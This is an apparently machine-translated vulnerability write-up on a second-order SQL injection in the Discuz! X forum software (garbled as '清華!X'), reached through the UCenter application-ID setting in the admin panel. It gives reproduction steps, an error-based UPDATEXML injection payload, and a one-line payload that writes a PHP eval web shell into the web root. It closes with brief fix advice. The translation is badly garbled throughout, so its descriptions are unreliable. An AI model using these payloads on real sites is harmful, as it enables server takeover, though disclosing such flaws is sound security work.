[脆弱性分析] SQLインジェクションの脆弱性の背景の清華!Xシリーズのフルバージョン

 

0x01の脆弱性の説明

SQLインジェクションの脆弱性の清華!Xのフルバージョン。二次注入に脆弱性が起こりソース\ admincp \ admincp_setting.php settingnew $を処理[「UC」]完全にフィルタ処理されていないパラメータ[「APPID」]、リードを引き起こします。特定の条件下では、攻撃者がサーバーへのアクセスを得るために、この脆弱性を悪用する可能性があります。

0x02の範囲

清華のよう清華!Xシリーズのフルバージョン、!Xの最新清華!X3.4 R20191201バージョン

0x03の脆弱性の詳細

(1)\ソース\ admincp \ admincp_setting.php最初の行2571は、ユーザ制御可能なパラメータ$ settingnew [ 'UC'] [ 'APPID']置き換える。\ config_ucenter.php一定値プロファイルの構成\ UC_APPID、及び設定ファイル

 

(2)\ uc_client \モデル\ Base.phpという線206、UC_APPIDは、SQL文の中に直接にスプライス

 

(3)関数を呼び出すときに、二次注入をトリガーします

 

 

 

0x04の再現性のある脆弱性

(1)マスター-UCenter装置1 'でアプリケーションID入力

 

(2)ホームアクセスはSQLエラートリガを生成します。

 

(3)追加のペイロードのテストを挿入することが可能です

1 ' 及び(UPDATEXML(1、CONCAT(0x7Eを、(選択バージョン())、0x7Eを)、1)); - A

 

(4)馬を書きます

1' union select '<?php @eval($_POST[1]);?>' into outfile 'C:/phpStudy/PHPTutorial/WWW/shell.php';-- a

 

 

 

0x05修复建议

(1)后台不使用弱口令

(2)官方暂未发布补丁,关注官方补丁信息

おすすめ

転載: www.cnblogs.com/0nth3way/p/12025287.html